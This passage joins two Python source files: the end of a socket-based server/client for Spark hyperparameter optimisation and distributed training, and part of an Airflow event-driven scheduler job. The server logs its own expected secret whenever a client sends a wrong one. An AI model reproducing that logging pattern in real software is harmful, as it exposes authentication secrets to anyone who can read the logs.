) # Prepare response in callback.
except KeyError:
resp["type"] = "ERR"
MessageSocket.send(self, sock, resp)
def _register_callbacks(self):
message_callbacks = {}
for key, call in self.callback_list:
message_callbacks[key] = call
return message_callbacks
def start(self, exp_driver):
"""
Start listener in a background thread.
Returns:
address of the Server as a tuple of (host, port)
"""
global SERVER_HOST_PORT
server_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
server_sock, SERVER_HOST_PORT = EnvSing.get_instance().connect_host(
server_sock, SERVER_HOST_PORT, exp_driver
)
def _listen(self, sock, driver):
CONNECTIONS = []
CONNECTIONS.append(sock)
while not self.done:
read_socks, _, _ = select.select(CONNECTIONS, [], [], 1)
for sock in read_socks:
if sock == server_sock:
client_sock, client_addr = sock.accept()
CONNECTIONS.append(client_sock)
_ = client_addr
else:
try:
msg = self.receive(sock)
# raise exception if secret does not match
# so client socket gets closed
if not secrets.compare_digest(
msg["secret"], exp_driver._secret
):
exp_driver.log(
"SERVER secret: {}".format(exp_driver._secret)
)
exp_driver.log(
"ERROR: wrong secret {}".format(msg["secret"])
)
raise Exception
self._handle_message(sock, msg, driver)
except Exception:
sock.close()
CONNECTIONS.remove(sock)
server_sock.close()
threading.Thread(
target=_listen, args=(self, server_sock, exp_driver), daemon=True
).start()
return SERVER_HOST_PORT
def stop(self):
"""
Stop the server's socket listener.
"""
self.done = True
class OptimizationServer(Server):
"""Implements the server for hyperparameter optimization and ablation."""
def __init__(self, num_executors: int):
"""Registers the callbacks for message handling.
:param num_executors: Number of Spark executors scheduled for the
experiment.
"""
super().__init__(num_executors)
self.callback_list = [
("REG", self._register_callback),
("QUERY", self._query_callback),
("METRIC", self._metric_callback),
("FINAL", self._final_callback),
("GET", self._get_callback),
("LOG", self._log_callback),
]
self.message_callbacks = self._register_callbacks()
def _register_callback(self, resp: dict, msg: dict, exp_driver: Driver) -> None:
"""Register message callback.
Checks if the executor was registered before and reassignes lost trial,
otherwise assignes a new trial to the executor.
"""
lost_trial = self.reservations.get_assigned_trial(msg["partition_id"])
if lost_trial is not None:
# the trial or executor must have failed
exp_driver.get_trial(lost_trial).status = Trial.ERROR
# add a blacklist message to the worker queue
fail_msg = {
"partition_id": msg["partition_id"],
"type": "BLACK",
"trial_id": lost_trial,
}
self.reservations.add(msg["data"])
exp_driver.add_message(fail_msg)
else:
# else add regular registration msg to queue
self.reservations.add(msg["data"])
exp_driver.add_message(msg)
resp["type"] = "OK"
def _query_callback(self, resp: dict, *_: Any) -> None:
"""Query message callback.
Checks if all executors have been registered successfully on the server.
"""
resp["type"] = "QUERY"
resp["data"] = self.reservations.done()
def _metric_callback(self, resp: dict, msg: dict, exp_driver: Driver) -> None:
"""Metric message callback.
Determines if a trial should be stopped or not.
"""
exp_driver.add_message(msg)
if msg["trial_id"] is None:
resp["type"] = "OK"
elif msg["trial_id"] is not None and msg.get("data", None) is None:
resp["type"] = "OK"
else:
# lookup executor reservation to find assigned trial
# get early stopping flag, should be False for ablation
flag = exp_driver.get_trial(msg["trial_id"]).get_early_stop()
resp["type"] = "STOP" if flag else "OK"
def _final_callback(self, resp: dict, msg: dict, exp_driver: Driver) -> None:
"""Final message callback.
Resets the reservation to avoid sending the trial again.
"""
self.reservations.assign_trial(msg["partition_id"], None)
resp["type"] = "OK"
# add metric msg to the exp driver queue
exp_driver.add_message(msg)
def _get_callback(self, resp: dict, msg: dict, exp_driver: Driver) -> None:
# lookup reservation to find assigned trial
trial_id = self.reservations.get_assigned_trial(msg["partition_id"])
# trial_id needs to be none because experiment_done can be true but
# the assigned trial might not be finalized yet
if exp_driver.experiment_done and trial_id is None:
resp["type"] = "GSTOP"
else:
resp["type"] = "TRIAL"
resp["trial_id"] = trial_id
# retrieve trial information
if trial_id is not None:
resp["data"] = exp_driver.get_trial(trial_id).params
exp_driver.get_trial(trial_id).status = Trial.RUNNING
else:
resp["data"] = None
def _log_callback(self, resp: dict, _: Any, exp_driver: Driver) -> None:
"""Log message callback.
Copies logs from the driver and returns them.
"""
# get data from experiment driver
result, log = exp_driver.get_logs()
resp["type"] = "OK"
resp["ex_logs"] = log if log else None
resp["num_trials"] = exp_driver.num_trials
resp["to_date"] = result["num_trials"]
resp["stopped"] = result["early_stopped"]
resp["metric"] = result["best_val"]
def get_assigned_trial_id(self, partition_id: int) -> dict:
"""Returns the id of the assigned trial, given a ``partition_id``.
:param partition_id: The partition id to look up.
:returns: The trial ID of the partition.
"""
return self.reservations.get_assigned_trial(partition_id)
class DistributedTrainingServer(Server):
"""Implements the server for distributed training."""
def __init__(self, num_executors: int):
"""Registers the callbacks for message handling.
:param num_executors: Number of Spark executors scheduled for the
experiment.
"""
super().__init__(num_executors)
self.callback_list = [
("REG", self._register_callback),
("METRIC", self._metric_callback),
("EXEC_CONFIG", self._exec_config_callback),
("LOG", self._log_callback),
("QUERY", self._query_callback),
("FINAL", self._final_callback),
]
self.message_callbacks = self._register_callbacks()
def _register_callback(self, resp: dict, msg: dict, exp_driver: Driver) -> None:
"""Register message callback.
Saves workers connection metadata for initialization of distributed
backend.
"""
self.reservations.add(msg["data"])
exp_driver.add_message(msg)
resp["type"] = "OK"
def _exec_config_callback(self, resp: dict, *_: Any) -> None:
"""Executor config message callback.
Returns the connection info of all Spark executors registered.
"""
try:
resp["data"] = self.reservations.get()
except KeyError:
resp["data"] = None
resp["type"] = "OK"
def _log_callback(self, resp: dict, _: Any, exp_driver: Driver) -> None:
"""Log message callback.
Copies logs from the driver and returns them.
"""
_, log = exp_driver.get_logs()
resp["type"] = "OK"
resp["ex_logs"] = log if log else None
resp["num_trials"] = 1
resp["to_date"] = 0
resp["stopped"] = False
resp["metric"] = "N/A"
def _metric_callback(self, resp: dict, msg: dict, exp_driver: Driver) -> None:
"""Metric message callback.
Confirms heartbeat messages from the clients and adds logs to the driver.
"""
exp_driver.add_message(msg)
resp["type"] = "OK"
def _query_callback(self, resp: dict, *_: Any) -> None:
"""Query message callback.
Checks if all executors have been registered successfully on the server.
"""
resp["type"] = "QUERY"
resp["data"] = self.reservations.done()
def _final_callback(self, resp: dict, msg: dict, exp_driver: Driver) -> None:
"""Final message callback.
Adds final results to the message queue.
"""
resp["type"] = "OK"
exp_driver.add_message(msg)
class Client(MessageSocket):
"""Client to register and await node reservations.
Args:
:server_addr: a tuple of (host, port) pointing to the Server.
"""
def __init__(self, server_addr, partition_id, task_attempt, hb_interval, secret):
# socket for main thread
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.connect(server_addr)
# socket for heartbeat thread
self.hb_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.hb_sock.connect(server_addr)
self.server_addr = server_addr
self.done = False
self.client_addr = (
EnvSing.get_instance().get_ip_address(),
self.sock.getsockname()[1],
)
self.partition_id = partition_id
self.task_attempt = task_attempt
self.hb_interval = hb_interval
self._secret = secret
def _request(self, req_sock, msg_type, msg_data=None, trial_id=None, logs=None):
"""Helper function to wrap msg w/ msg_type."""
msg = {}
msg["partition_id"] = self.partition_id
msg["type"] = msg_type
msg["secret"] = self._secret
if msg_type == "FINAL" or msg_type == "METRIC":
msg["trial_id"] = trial_id
if logs == "":
msg["logs"] = None
else:
msg["logs"] = logs
msg["data"] = msg_data
done = False
tries = 0
while not done and tries < MAX_RETRIES:
try:
MessageSocket.send(self, req_sock, msg)
done = True
except socket.error as e:
tries += 1
if tries >= MAX_RETRIES:
raise
print("Socket error: {}".format(e))
req_sock.close()
req_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
req_sock.connect(self.server_addr)
return MessageSocket.receive(self, req_sock)
def close(self):
"""Close the client's sockets."""
self.sock.close()
self.hb_sock.close()
def register(self, registration):
"""
Register ``registration`` with server.
Args:
registration:
Returns:
"""
resp = self._request(self.sock, "REG", registration)
return resp
def await_reservations(self):
done = False
while not done:
done = self._request(self.sock, "QUERY").get("data", False)
time.sleep(1)
print("All executors registered: {}".format(done))
return done
def start_heartbeat(self, reporter):
def _heartbeat(self, reporter):
while not self.done:
backoff = True # Allow to tolerate HB failure on shutdown (once)
with reporter.lock:
metric, step, logs = reporter.get_data()
data = {"value": metric, "step": step}
try:
resp = self._request(
self.hb_sock, "METRIC", data, reporter.get_trial_id(), logs
)
except OSError as err: # TODO: Verify that this is necessary
if backoff:
backoff = False
time.sleep(5)
continue
raise OSError from err
self._handle_message(resp, reporter)
time.sleep(self.hb_interval)
threading.Thread(target=_heartbeat, args=(self, reporter), daemon=True).start()
reporter.log("Started metric heartbeat", False)
def get_suggestion(self, reporter):
"""Blocking call to get new parameter combination."""
while not self.done:
resp = self._request(self.sock, "GET")
trial_id, parameters = self._handle_message(resp, reporter) or (None, None)
if trial_id is not None:
break
time.sleep(1)
return trial_id, parameters
def get_exec_config(self, timeout=60):
config = None
start_time = time.time()
while not config and time.time() - start_time < timeout:
config = self._request(self.sock, "EXEC_CONFIG").get("data", None)
return config
def stop(self):
"""Stop the Clients's heartbeat thread."""
self.done = True
def _handle_message(self, msg, reporter=None):
"""
Handles a message dictionary. Expects a 'type' and 'data' attribute in
the message dictionary.
Args:
sock:
msg:
Returns:
"""
msg_type = msg["type"]
# if response is STOP command, early stop the training
if msg_type == "STOP":
reporter.early_stop()
elif msg_type == "GSTOP":
reporter.log("Stopping experiment", False)
self.done = True
elif msg_type == "TRIAL":
return msg["trial_id"], msg["data"]
elif msg_type == "ERR":
reporter.log("Stopping experiment", False)
self.done = True
def finalize_metric(self, metric, reporter):
# make sure heartbeat thread can't send between sending final metric
# and resetting the reporter
with reporter.lock:
_, _, logs = reporter.get_data()
resp = self._request(
self.sock, "FINAL", metric, reporter.get_trial_id(), logs
)
reporter.reset()
return resp
|
event_based_scheduler_job.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import os
import sched
import signal
import sys
import threading
import time
import traceback
from typing import Callable, List, Optional
from airflow.contrib.jobs.periodic_manager import PeriodicManager
from airflow.events.context_extractor import ContextExtractor, EventContext
from airflow.exceptions import SerializedDagNotFound, AirflowException
from airflow.models.dagcode import DagCode
from airflow.models.event_progress import get_event_progress, create_or_update_progress
from airflow.models.message import IdentifiedMessage, MessageState
from sqlalchemy import func, not_, or_, asc, case
from sqlalchemy.orm import selectinload
from sqlalchemy.orm.session import Session
from airflow import models, settings
from airflow.configuration import conf
from airflow.executors.base_executor import BaseExecutor
from airflow.jobs.base_job import BaseJob
from airflow.models import DagModel, BaseOperator
from airflow.models.dag import DagEventDependencies, DAG
from airflow.models.dagbag import DagBag
from airflow.models.dagrun import DagRun
from airflow.models.eventhandler import EventKey
from airflow.models.serialized_dag import SerializedDagModel
from airflow.models.taskinstance import TaskInstanceKey
from airflow.stats import Stats
from airflow.utils import timezone
from airflow.utils.log.logging_mixin import LoggingMixin
from airflow.utils.session import create_session, provide_session
from airflow.utils.sqlalchemy import prohibit_commit, skip_locked, with_row_locks
from airflow.utils.state import State
from airflow.utils.types import DagRunType
from airflow.utils.mailbox import Mailbox
from airflow.events.scheduler_events import (
StopSchedulerEvent, TaskSchedulingEvent, DagExecutableEvent, TaskStateChangedEvent, EventHandleEvent, RequestEvent,
ResponseEvent, StopDagEvent, ParseDagRequestEvent, ParseDagResponseEvent, SchedulerInnerEventUtil,
BaseUserDefineMessage, UserDefineMessageType, SCHEDULER_NAMESPACE, DagRunFinishedEvent, PeriodicEvent,
DagRunCreatedEvent, Status)
from notification_service.base_notification import BaseEvent
from notification_service.client import EventWatcher, NotificationClient
from airflow.contrib.jobs.dag_trigger import DagTrigger
from airflow.contrib.jobs.dagrun_event_manager import DagRunEventManager, DagRunId
from airflow.executors.scheduling_action import SchedulingAction
TI = models.TaskInstance
DR = models.DagRun
DM = models.DagModel
MSG = models.Message
class EventBasedScheduler(LoggingMixin):
def __init__(self, id,
mailbox: Mailbox,
task_event_manager: DagRunEventManager,
executor: BaseExecutor,
notification_client: NotificationClient,
notification_server_uri: str,
context=None,
periodic_manager: PeriodicManager = None):
super().__init__(context)
self.id = id
self.mailbox = mailbox
self.task_event_manager: DagRunEventManager = task_event_manager
self.executor = executor
self.notification_client = notification_client
self.dagbag = DagBag(read_dags_from_db=True)
self._timer_handler = None
self.timers = sched.scheduler()
self.periodic_manager = periodic_manager
self.notification_server_uri = notification_server_uri
def sync(self):
def call_regular_interval(
delay: float,
action: Callable,
arguments=(),
kwargs={},
): # pylint: disable=dangerous-default-value
def repeat(*args, **kwargs):
action(*args, **kwargs)
# This is not perfect. If we want a timer every 60s, but action
# takes 10s to run, this will run it every 70s.
# Good enough for now
self._timer_handler = self.timers.enter(delay, 1, repeat, args, kwargs)
self._timer_handler = self.timers.enter(delay, 1, repeat, arguments, kwargs)
call_regular_interval(
delay=conf.getfloat('scheduler', 'scheduler_heartbeat_sec', fallback='5.0'),
action=self.executor.sync
)
self.timers.run()
def stop_timer(self):
if self.timers and self._timer_handler:
self.timers.cancel(self._timer_handler)
def submit_sync_thread(self):
threading.Thread(target=self.sync).start()
def schedule(self) -> bool:
identified_message = self.mailbox.get_identified_message()
if not identified_message:
return True
origin_event = identified_message.deserialize()
self.log.debug("Event: {}".format(origin_event))
if SchedulerInnerEventUtil.is_inner_event(origin_event):
event = SchedulerInnerEventUtil.to_inner_event(origin_event)
else:
event = origin_event
with create_session() as session:
if isinstance(event, BaseEvent):
dagruns = self._find_dagruns_by_event(event, session)
for dagrun in dagruns:
dag_run_id = DagRunId(dagrun.dag_id, dagrun.run_id)
self.task_event_manager.handle_event(dag_run_id, event)
elif isinstance(event, RequestEvent):
self._process_request_event(event)
elif isinstance(event, TaskSchedulingEvent):
is_schedulable = self._task_is_schedulable(dag_id=event.dag_id,
task_id=event.task_id,
execution_date=event.execution_date,
session=session)
if is_schedulable:
self._schedule_task(event)
else:
self.log.info("dag_id: {} task_id: {} execution_date: {} is not schedulable."
.format(event.dag_id, event.task_id, event.execution_date))
elif isinstance(event, TaskStateChangedEvent):
dagrun = self._find_dagrun(event.dag_id, event.execution_date, session)
if dagrun is not None:
self._handle_task_status_changed(dagrun, event, session)
dag_run_id = DagRunId(dagrun.dag_id, dagrun.run_id)
self.task_event_manager.handle_event(dag_run_id, origin_event)
tasks = self._find_downstream_tasks(event.task_id, dagrun, session)
self._send_scheduling_task_events(tasks, SchedulingAction.START)
if dagrun.state in State.finished:
self.mailbox.send_message(DagRunFinishedEvent(dagrun.dag_id, dagrun.execution_date).to_event())
else:
self.log.warning("dagrun is None for dag_id:{} execution_date: {}".format(event.dag_id,
event.execution_date))
elif isinstance(event, DagRunCreatedEvent):
dagrun = self._find_dagrun(event.dag_id, event.execution_date, session)
if dagrun is not None:
tasks = self._find_scheduled_tasks(dagrun, session)
self._send_scheduling_task_events(tasks, SchedulingAction.START)
else:
self.log.warning("dagrun is None for dag_id:{} execution_date: {}".format(
event.dag_id, event.execution_date))
elif isinstance(event, DagExecutableEvent):
if DagModel.dag_needing_dagruns(session, event.dag_id):
dagrun = self._create_dag_run(event.dag_id, session=session)
tasks = self._find_scheduled_tasks(dagrun, session)
self._send_scheduling_task_events(tasks, SchedulingAction.START)
elif isinstance(event, EventHandleEvent):
dag_runs = DagRun.find(dag_id=event.dag_id, run_id=event.dag_run_id)
if len(dag_runs) < 1:
self.log.warning("DagRun not found by dag_id:{}, run_id:{}".format(
event.dag_id, event.dag_run_id))
else:
ti = dag_runs[0].get_task_instance(event.task_id)
self._send_scheduling_task_event(ti, event.action)
elif isinstance(event, StopDagEvent):
self._stop_dag(event.dag_id, session)
elif isinstance(event, DagRunFinishedEvent):
self._stop_scheduling_periodic_tasks(event.dag_id, event.execution_date)
elif isinstance(event, PeriodicEvent):
dag_runs = DagRun.find(dag_id=event.dag_id, execution_date=event.execution_date)
if len(dag_runs) < 1:
self.log.warning("DagRun not found by dag_id:{}, execution_date:{}".format(
event.dag_id, event.execution_date))
else:
dag_run = dag_runs[0]
if dag_run.get_state() == State.RUNNING:
ti = dag_runs[0].get_task_instance(event.task_id)
self._send_scheduling_task_event(ti, SchedulingAction.RESTART)
else:
self.periodic_manager.remove_task(dag_id=event.dag_id,
execution_date=event.execution_date,
task_id=event.task_id)
self.log.info("Dag run's state is not running(dag_id:{} execution_date: {}), "
"so stop periodic scheduling task(id: {})".format(event.dag_id,
str(event.execution_date),
event.task_id))
elif isinstance(event, StopSchedulerEvent):
self.log.info("{} {}".format(self.id, event.job_id))
if self.id == event.job_id or 0 == event.job_id:
self.log.info("break the scheduler event loop.")
identified_message.remove_handled_message()
session.expunge_all()
return False
elif isinstance(event, ParseDagRequestEvent) or isinstance(event, ParseDagResponseEvent):
pass
elif isinstance(event, ResponseEvent):
pass
else:
self.log.error("can not handler the event {}".format(event))
identified_message.remove_handled_message()
session.expunge_all()
return True
def _handle_task_status_changed(self, dagrun: DagRun, event: TaskStateChangedEvent, session):
ti = dagrun.get_task_instance(task_id=event.task_id)
if event.try_number == ti.try_number:
if State.UP_FOR_RETRY == event.state:
dag = self.dagbag.get_dag(dagrun.dag_id, session=session)
ti.task = dag.get_task(ti.task_id)
next_retry_datetime = ti.next_retry_datetime()
self.mailbox.send_message(message=TaskSchedulingEvent(dag_id=event.dag_id,
task_id=event.task_id,
execution_date=event.execution_date,
try_number=event.try_number,
action=SchedulingAction.START).to_event(),
queue_time=next_retry_datetime)
ti.update_latest_task_execution(session=session)
def stop(self) -> None:
self.mailbox.send_message(StopSchedulerEvent(self.id).to_event())
self.log.info("Send stop event to the scheduler.")
def recover(self, last_scheduling_id):
lost_dag_codes = DagCode.recover_lost_dag_code()
self.log.info("Found %s dags not exists in DAG folder, recovered from DB. Dags' path: %s",
len(lost_dag_codes), lost_dag_codes)
self.log.info("Waiting for executor recovery...")
self.executor.recover_state()
unprocessed_messages = self.get_unprocessed_message(last_scheduling_id)
self.log.info("Recovering %s messages of last scheduler job with id: %s",
len(unprocessed_messages), last_scheduling_id)
for msg in unprocessed_messages:
self.mailbox.send_message(msg.deserialize(), msg.queue_time)
@staticmethod
def get_unprocessed_message(last_scheduling_id: int) -> List[IdentifiedMessage]:
with create_session() as session:
results: List[MSG] = session.query(MSG).filter(
MSG.scheduling_job_id == last_scheduling_id,
MSG.state == MessageState.QUEUED
).order_by(asc(MSG.id)).all()
unprocessed: List[IdentifiedMessage] = []
for msg in results:
unprocessed.append(IdentifiedMessage(msg.data, msg.id, msg.queue_time))
return unprocessed
def _find_dagrun(self, dag_id, execution_date, session) -> DagRun:
dagrun = session.query(DagRun).filter(
DagRun.dag_id == dag_id,
DagRun.execution_date == execution_date
).first()
return dagrun
def _register_periodic_events(self, execution_date, dag, session=None):
self.periodic_manager.store.set_session(session)
for task in dag.tasks:
if task.executor_config is not None and 'periodic_config' in task.executor_config:
self.log.debug('register periodic task {} {} {}'.format(dag.dag_id, execution_date, task.task_id))
self.periodic_manager.add_task(dag_id=dag.dag_id,
execution_date=execution_date,
task_id=task.task_id,
periodic_config=task.executor_config['periodic_config'])
self.periodic_manager.store.unset_session()
@provide_session
def _stop_scheduling_periodic_tasks(self, dag_id, execution_date, session=None):
dagruns = DagRun.find(dag_id=dag_id, execution_date=execution_date)
if not dagruns:
self.log.warning(f'Gets no dagruns to remove periodic events with dag_id: {dag_id} '
f'and execution_date: {execution_date}.')
else:
dag = self.dagbag.get_dag(dag_id=dagruns[0].dag_id, session=session)
for task in dag.tasks:
if task.executor_config is not None and 'periodic_config' in task.executor_config:
self.log.debug('remove periodic task {} {} {}'.format(dag_id, execution_date, task.task_id))
self.periodic_manager.remove_task(dag_id, execution_date, task.task_id)
def _create_dag_run(self, dag_id, session, run_type=DagRunType.SCHEDULED, context=None) -> DagRun:
with prohibit_commit(session) as guard:
if settings.USE_JOB_SCHEDULE:
"""
Unconditionally create a DAG run for the given DAG, and update the dag_model's fields to control
if/when the next DAGRun should be created
"""
try:
dag = self.dagbag.get_dag(dag_id, session=session)
dag_model = session \
.query(DagModel).filter(DagModel.dag_id == dag_id).first()
if dag_model is None:
return None
next_dagrun = dag_model.next_dagrun
dag_hash = self.dagbag.dags_hash.get(dag.dag_id)
external_trigger = False
# register periodic task
if run_type == DagRunType.MANUAL:
next_dagrun = timezone.utcnow()
external_trigger = True
# Explicitly check if the DagRun already exists. This is an edge case
# where a Dag Run is created but `DagModel.next_dagrun` and `DagModel.next_dagrun_create_after`
# are not updated.
active_dagrun = session.query(DagRun) \
.filter(DagRun.dag_id == dag_model.dag_id,
DagRun.execution_date == dag_model.next_dagrun).first()
if active_dagrun is not None:
self.log.info("Dagrun already created, %s", active_dagrun)
return active_dagrun
dag_run = dag.create_dagrun(
run_type=run_type,
execution_date=next_dagrun,
start_date=timezone.utcnow(),
state=State.RUNNING,
external_trigger=external_trigger,
session=session,
dag_hash=dag_hash,
creating_job_id=self.id,
context=context
)
if run_type == DagRunType.SCHEDULED:
self._update_dag_next_dagrun(dag_id, session)
self._register_periodic_events(dag_run.execution_date, dag, session)
# commit the session - Release the write lock on DagModel table.
guard.commit()
# END: create dagrun
return dag_run
except SerializedDagNotFound:
self.log.exception("DAG '%s' not found in serialized_dag table", dag_id)
return None
except Exception:
self.log.exception("Error occurred when create dag_run of dag: %s", dag_id)
return None
def _update_dag_next_dagrun(self, dag_id, session):
"""
Bulk update the next_dagrun and next_dagrun_create_after for all the dags.
We batch the select queries to get info about all the dags at once
"""
active_runs_of_dag = session \
.query(func.count('*')).filter(
DagRun.dag_id == dag_id,
DagRun.state == State.RUNNING,
DagRun.external_trigger.is_(False),
).scalar()
dag_model = session \
.query(DagModel).filter(DagModel.dag_id == dag_id).first()
dag = self.dagbag.get_dag(dag_id, session=session)
if dag.max_active_runs and active_runs_of_dag >= dag.max_active_runs:
self.log.info(
"DAG %s is at (or above) max_active_runs (%d of %d), not creating any more runs",
dag.dag_id,
active_runs_of_dag,
dag.max_active_runs,
)
dag_model.next_dagrun_create_after = None
else:
dag_model.next_dagrun, dag_model.next_dagrun_create_after = dag.next_dagrun_info(
dag_model.next_dagrun
)
@staticmethod
def _task_is_schedulable(dag_id, task_id, execution_date, session) -> bool:
task_instance = session.query(TI).filter(TI.dag_id == dag_id,
TI.task_id == task_id,
TI.execution_date == execution_date).first()
if task_instance is None or task_instance.is_schedulable is False:
return False
else:
return True
def _schedule_task(self, scheduling_event: TaskSchedulingEvent):
task_key = TaskInstanceKey(
scheduling_event.dag_id,
scheduling_event.task_id,
scheduling_event.execution_date,
scheduling_event.try_number
)
self.executor.schedule_task(task_key, scheduling_event.action)
def _find_dagruns_by_event(self, event, session) -> Optional[List[DagRun]]:
affect_dag_runs = []
event_key = EventKey(event.key, event.event_type, event.namespace, event.sender)
dag_runs = session \
.query(DagRun).filter(DagRun.state == State.RUNNING).all()
self.log.debug('dag_runs {}'.format(len(dag_runs)))
if dag_runs is None or len(dag_runs) == 0:
return affect_dag_runs
dags = session.query(SerializedDagModel).filter(
SerializedDagModel.dag_id.in_(dag_run.dag_id for dag_run in dag_runs)
).all()
self.log.debug('dags {}'.format(len(dags)))
affect_dags = {}
for dag in dags:
self.log.debug('dag config {}'.format(dag.event_relationships))
self.log.debug('event key {} {} {}'.format(event.key, event.event_type, event.namespace))
dep: DagEventDependencies = DagEventDependencies.from_json(dag.event_relationships)
if dep.is_affect(event_key):
context_extractor: ContextExtractor = dag.context_extractor
try:
event_context: EventContext = context_extractor.extract_context(event)
except Exception as e:
self.log.error(
"Failed to call context extractor, dag {} skips event {}".format(dag.dag_id, event),
exc_info=e)
continue
if event_context is not None:
affect_dags[dag.dag_id] = event_context
if len(affect_dags) == 0:
return affect_dag_runs
for dag_run in dag_runs:
if dag_run.dag_id in affect_dags:
event_context: EventContext = affect_dags[dag_run.dag_id]
if event_context.is_broadcast() or dag_run.context in event_context.get_contexts():
affect_dag_runs.append(dag_run)
return affect_dag_runs
def _find_scheduled_tasks(
self,
dag_run: DagRun,
session: Session,
check_execution_date=False
) -> Optional[List[TI]]:
"""
Make scheduling decisions about an individual dag run
``currently_active_runs`` is passed in so that a batch query can be
used to ask this for all dag runs in the batch, to avoid an n+1 query.
:param dag_run: The DagRun to schedule
:return: scheduled tasks
"""
if not dag_run or dag_run.get_state() in State.finished:
return
try:
dag = dag_run.dag = self.dagbag.get_dag(dag_run.dag_id, session=session)
except SerializedDagNotFound:
self.log.exception("DAG '%s' not found in serialized_dag table", dag_run.dag_id)
return None
if not dag:
self.log.error("Couldn't find dag %s in DagBag/DB!", dag_run.dag_id)
return None
currently_active_runs = session.query(
TI.execution_date,
).filter(
TI.dag_id == dag_run.dag_id,
TI.state.notin_(list(State.finished)),
).distinct().all()
if check_execution_date and dag_run.execution_date > timezone.utcnow() and not dag.allow_future_exec_dates:
self.log.warning("Execution date is in future: %s", dag_run.execution_date)
return None
if dag.max_active_runs and not dag.is_long_running_dag():
if (
len(currently_active_runs) >= dag.max_active_runs
and dag_run.execution_date not in currently_active_runs
):
self.log.warning(
"DAG %s already has %d active runs, not queuing any tasks for run %s",
dag.dag_id,
len(currently_active_runs),
dag_run.execution_date,
)
self._verify_integrity_if_dag_changed(dag_run=dag_run, session=session)
schedulable_tis, callback_to_run = dag_run.update_state(session=session, execute_callbacks=False)
dag_run.schedule_tis(schedulable_tis, session)
session.commit()
query = (session.query(TI)
.outerjoin(TI.dag_run)
.filter(DR.run_id == dag_run.run_id)
.join(TI.dag_model)
.filter(not_(DM.is_paused))
.filter(TI.state == State.SCHEDULED)
.options(selectinload('dag_model')))
scheduled_tis: List[TI] = with_row_locks(
query,
of=TI,
**skip_locked(session=session),
).all()
return scheduled_tis
def _find_downstream_tasks(self, task_id, dag_run, session) -> Optional[List[TI]]:
tasks = self._find_scheduled_tasks(dag_run, session)
if not tasks or len(tasks) == 0:
return None
dag = self.dagbag.get_dag(dag_run.dag_id, session=session)
downstream_task_ids = dag.task_dict.get(task_id).downstream_task_ids
res = []
for task in tasks:
if task.task_id in downstream_task_ids:
res.append(task)
return res
@provide_session
def _verify_integrity_if_dag_changed(self, dag_run: DagRun, session=None):
"""Only run DagRun.verify integrity if Serialized DAG has changed since it is slow"""
latest_version = SerializedDagModel.get_latest_version_hash(dag_run.dag_id, session=session)
if dag_run.dag_hash == latest_version:
self.log.debug("DAG %s not changed structure, skipping dagrun.verify_integrity", dag_run.dag_id)
return
dag_run.dag_hash = latest_version
# Refresh the DAG
dag_run.dag = self.dagbag.get_dag(dag_id=dag_run.dag_id, session=session)
# Verify integrity also takes care of session.flush
dag_run.verify_integrity(session=session)
def _send_scheduling_task_event(self, ti: Optional[TI], action: SchedulingAction):
if ti is None or action == SchedulingAction.NONE:
return
with create_session() as session:
ti.state = State.QUEUED
session.commit()
task_scheduling_event = TaskSchedulingEvent(
ti.task_id,
ti.dag_id,
ti.execution_date,
ti.try_number,
action
)
self.mailbox.send_message(task_scheduling_event.to_event())
def _send_scheduling_task_events(self, tis: Optional[List[TI]], action: SchedulingAction):
if tis is None:
return
for ti in tis:
self._send_scheduling_task_event(ti, action)
@provide_session
def _emit_pool_metrics(self, session: Session = None) -> None:
pools = models.Pool.slots_stats(session=session)
for pool_name, slot_stats in pools.items():
Stats.gauge(f'pool.open_slots.{pool_name}', slot_stats["open"])
Stats.gauge(f'pool.queued_slots.{pool_name}', slot_stats[State.QUEUED])
Stats.gauge(f'pool.running_slots.{pool_name}', slot_stats[State.RUNNING])
@staticmethod
def _reset_unfinished_task_state(dag_run):
with create_session() as session:
to_be_reset = [s for s in State.unfinished if s not in [State.RUNNING, State.QUEUED]]
tis = dag_run.get_task_instances(to_be_reset, session)
for ti in tis:
ti.state = State.NONE
session.commit()
@provide_session
def restore_unfinished_dag_run(self, session):
dag_runs = DagRun.next_dagruns_to_examine(session, max_number=sys.maxsize).all()
if not dag_runs or len(dag_runs) == 0:
return
for dag_run in dag_runs:
self._reset_unfinished_task_state(dag_run)
tasks = self._find_scheduled_tasks(dag_run, session)
self._send_scheduling_task_events(tasks, SchedulingAction.START)
@provide_session
def heartbeat_callback(self, session: Session = None) -> None:
Stats.incr('scheduler_heartbeat', 1, 1)
@provide_session
def _process_request_event(self, event: RequestEvent, session: Session = None):
try:
message = BaseUserDefineMessage()
message.from_json(event.body)
if message.message_type == UserDefineMessageType.RUN_DAG:
# todo make sure dag file is parsed.
dagrun = self._create_dag_run(message.dag_id, session=session, run_type=DagRunType.MANUAL,
context=message.context)
if not dagrun:
self.log.error("Failed to create dag_run.")
# TODO Need to add ret_code and errro_msg in ExecutionContext in case of exception
self.notification_client.send_event(ResponseEvent(event.request_id, None).to_event())
return
tasks = self._find_scheduled_tasks(dagrun, session, False)
self._send_scheduling_task_events(tasks, SchedulingAction.START)
self.notification_client.send_event(ResponseEvent(event.request_id, dagrun.run_id).to_event())
elif message.message_type == UserDefineMessageType.STOP_DAG_RUN:
dag_run = DagRun.get_run_by_id(session=session, dag_id=message.dag_id, run_id=message.dagrun_id)
self._stop_dag_run(dag_run)
self.notification_client.send_event(ResponseEvent(event.request_id, dag_run.run_id).to_event())
elif message.message_type == UserDefineMessageType.EXECUTE_TASK:
dagrun = DagRun.get_run_by_id(session=session, dag_id=message.dag_id, run_id=message.dagrun_id)
ti: TI = dagrun.get_task_instance(task_id=message.task_id)
self.mailbox.send_message(TaskSchedulingEvent(
task_id=ti.task_id,
